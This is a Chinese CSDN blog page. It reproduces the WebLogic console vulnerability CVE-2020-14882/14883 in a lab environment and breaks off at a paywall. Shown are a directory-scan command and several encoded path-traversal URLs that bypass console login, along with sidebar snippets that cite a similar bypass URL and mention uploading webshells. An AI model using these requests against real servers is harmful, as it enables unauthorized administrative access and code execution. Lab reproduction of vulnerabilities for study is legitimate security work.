Weblogic Console HTTP协议远程代码执行漏洞复现(CVE-2020-14882,3)

最新推荐文章于 2024-03-01 14:01:47 发布
最新推荐文章于 2024-03-01 14:01:47 发布
阅读量638 收藏 1
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hackzkaq/article/details/113878055
版权 
更多黑客技能 公众号:暗网黑客

作者:掌控安全-xiao_yi

0x01 信息收集

打开靶场地址,看到404页面不要慌张,先进行信息收集!

image.png

由于是靶场,就进行目录扫描,就不用进行子域名爆破了~

利用dirsearch进行爆破:

python3 dirsearch/dirsearch.py -u "http://172.23.26.66:7001/" -e \*

image.png

先访问200页面发现全是空页面,再尝试访问302重定向后的页面,发现了新天地!

image.png

发现这是一个WebLogic, 并且有版本号,此时只用百度一下,就发现了该版本存在多个漏洞,最后我将它定位在 CVE-2020-14882

0x02 复现

在读完博客中大佬对该漏洞的复现之后,尝试自己进行复现并拿到webshell。

0#01 权限漏洞绕过

在最初的这个页面,是需要账号和用户名登录才可以进入后台,但是这里可以进行目录的骚操作来进行直接无密码登录后台。

http://172.23.26.66:7001/console/css/../console.portal

这条构造的url表示由于 …/在目录中表示返回上一级目录, 即console这个目录,然后访问该目录下的后台文件

image.png

但是运行结果并不像我们像的那样, 还是被重定向到登陆页面

这里就需要一些小技巧进行绕过,用burp的url编码功能对…/进行编码

http://172.23.26.66:7001/console/images/%2E%2E%2Fconsole.portal

结果还是被重定向了

将大写换成小写

http://172.23.26.66:7001/console/images/%2e%2e%2fconsole.portal无果

再进行一次url编码

http://172.23.26.66:7001/console/images/%252e%252e
最低0.47元/天 解锁文章
zkzq
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Oracle WebLogic Server远程代码执行漏洞 CVE-2020-14750 已亲自复现_cve-2020-14750漏洞复现
2401_83739434的博客
04-03 1368
环境启动后,访问http://192.168.63.129:7001/console/login/LoginForm.jsp,说明已成功启动。
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
11-23
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)以及安装步骤
HTTP使用WEBLOGIC修改为HTTPS协议
05-03
自用,使用WEBLOGIC将普通http协议修改为HTTPS加密协议,为了过评审没办法,写出自用手册
Weblogic通过HTTP/T3/IIOP协议部署war包
fnmsd的博客
04-24 8981
水文一篇,主要应对存在弱口令但删除了Console的情况。 重点说三遍: 需要账号密码、需要账号密码、需要账号密码 主要应对console应用被删掉,但仍然使用弱口令的情况。 几处登陆点(HTTP/T3/IIOP)共用账号锁定,只要加起来错误过五次,就会锁定半个小时。 最常见做法:HTTP console应用部署 最常见方法,此处略过。 可以参考:https://www.cnblogs.com/D...
weblogic上传木马路径选择
weixin_30883311的博客
02-03 731
对于反序列化漏洞,如果获得的是系统权限或者root权限,那就没必要上传木马,但如果只是web安装应用的权限,就上传获取更大权限。 上传需要找到几个点,获取物理路径,如下面三种: 方法1:把shell写到控制台images目录中 \Oracle\Middleware\wlserver_10.3\server\lib\consoleapp\webapp\framework\skins\w...
Weblogic未授权访问漏洞-CVE-2020-14882&&CVE-2020-14883
weixin_51151498的博客
12-05 1565
weblogic漏洞复现
CVE-2020-14882&14883 Weblogic 管理控制台未授权远程命令执行漏洞复现
ierciyuan的博客
07-30 961
CVE-2020-14882&14883Weblogic管理控制台未授权远程命令执行漏洞复现。提供相关软件包(网盘)
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)
09-14
20180717官网发布Weblogic反序列化远程代码执行漏洞(CVE-2018-2893)漏洞修复补丁
weblogic修改控制台ip_Weblogic未授权访问及命令执行分析复现
weixin_39640085的博客
12-12 1249
一、背景漏洞概述:WebLogic是美国Oracle公司的主要产品之一,是商业市场上主要的 J2EE 应用服务器软件,也是世界上第一个成功商业化的J2EE应用服务器,在 Java 应用服务器中有非常广泛的部署和应用。10月21日,Oracle官方发布数百个组件的高危漏洞公告。其中组合利用CVE-2020-14882/ CVE-2020-14883可使未经授权的攻击者绕过WebLogic后台登录等限...
Weblogic常见漏洞详解
最新发布
m0_64481831的博客
03-01 2745
Weblogic 是一个基于JavaEE架构的中间件,是用于开发、集成、部署和管理大型分布式为Web应用、网络应用和数据库应用的Java应用服务器。Weblogic由纯Java开发,被广泛应用于开发、部署和运行Java应用等适用于本地环境和云环境的企业应用。所以,Weblogic在面试当中被提到频率还蛮高的。这篇文章以vulhub靶场为辅。Weblogic中间件常见漏洞文章讲了任意文件读取和弱口令登录、未授权访问后台和HTTP请求远程代码执行、SSRF利用、XMLDecoder反序列化漏洞
weblogic修改控制台ip_【漏洞分析】WebLogic未授权命令执行漏洞CVE202014882/CVE202014883)...
weixin_39755136的博客
12-12 556
01漏洞概述WebLogic是美国Oracle公司出品的application server,确切地说是基于Java EE架构的中间件。WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。未经身份验证的远程攻击者可通过构造特殊的HTTP请求,利用该漏洞,在受影响的WebLogic Server上执行任意代码。02影响范围Oracle...
CVE-2020-14882 | Weblogic未授权命令执行漏洞复现
AzVoidSUN的博客
11-04 1332
环境安装 首先电脑已安装好的jdk \bin目录下 然后java -jar 执行你的jar包就可以了 Oracle WebLogic Server版本:10.3.6.0,12.1.3.0,12.2.1.3,12.2.1.4,14.1.1.0。均存在此漏洞。 构造poc ,未授权访问后台地址http://127.0.0.1:7001/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsCo
Weblogic Console HTTP协议远程代码执行漏洞CVE-2020-14882
chaojixiaojingang
10-30 4136
1.漏洞描述 未经身份验证的远程攻击者可通过构造特殊的 HTTP GE请求,利用该漏洞在受影响的WebLogic Server上执行任意代码。 2.影响版本 Oracle Weblogic Server 10.3.6.0.0 Oracle Weblogic Server 12.1.3.0.0 Oracle Weblogic Server 12.2.1.3.0 Oracle Weblogic Server 12.2.1.4.0 Oracle Weblogic Server 14.1.1.0.0
凶残的挖矿脚本,奴役我数千机器!
热门推荐
weixin_39787242的博客
08-09 1万+
本文转载自不正经程序员 温馨提示:本文中出现的命令和脚本,不要在自家服务器上随便运行,除非你知道自己在做什么。 挖矿是把机器当作奴隶,一刻不停歇的去计算、运转,本质上是个无用的工作。但可惜的是,它能赚钱。用别人的机器去赚钱,更是很多人梦寐以求的,所以挖矿脚本屡禁不止。 有钱的地方,就有技术。但反过来并不一定成立。 牢记这个准则,就能够心平气和的学习新技术,而不是气急败坏的纠结为啥没钱。 1. 脚本从哪来? 下面是一个http的报文。 GET /console/images/%2E%2E%2F
【vulhub】Weblogic Console HTTP协议远程代码执行漏洞复现CVE-2020-14882漏洞复现
qq_45300786的博客
04-10 386
https://www.cnblogs.com/backlion/p/13951858.html
WeblogicCVE-2020-14882CVE-2020-14883) 管理控制台未授权远程命令执行漏洞
god_Zeo的安全博客
11-02 6053
WeblogicCVE-2020-14882CVE-2020-14883) 管理控制台未授权远程命令执行漏洞 0x01 漏洞简述 2020年10月29日,360CERT监测发现 Weblogic ConSole HTTP 协议代码执行漏洞,该漏洞编号为 CVE-2020-14882,CVE-2020-14883漏洞等级:严重,漏洞评分:9.8。 远程攻击者可以构造特殊的HTTP请求,在未经身份验证的情况下接管 WebLogic Server Console,并在 WebLogic Server Co
CVE-2020-14882漏洞修复
07-28
根据引用\[1\]中提到的Oracle官方发布的2020年10月关键补丁更新公告CPU(Critical Patch Update),其中包含了修复CVE-2020-14882漏洞的补丁。这个漏洞存在于Weblogic Console中,攻击者可以通过构造特殊的HTTP GET请求,在受影响的WebLogic Server上执行任意代码。因此,为了修复CVE-2020-14882漏洞,您需要安装Oracle发布的最新关键补丁更新。这样可以确保您的系统不再受到该漏洞的影响。 #### 引用[.reference_title] - *1* [CVE-2020-14882weblogic 未授权命令执行漏洞验证及修复](https://blog.csdn.net/weixin_38896449/article/details/110480656)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [Weblogic Console远程代码执行漏洞(CVE-2020-14882)](https://blog.csdn.net/weixin_42181573/article/details/117526222)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值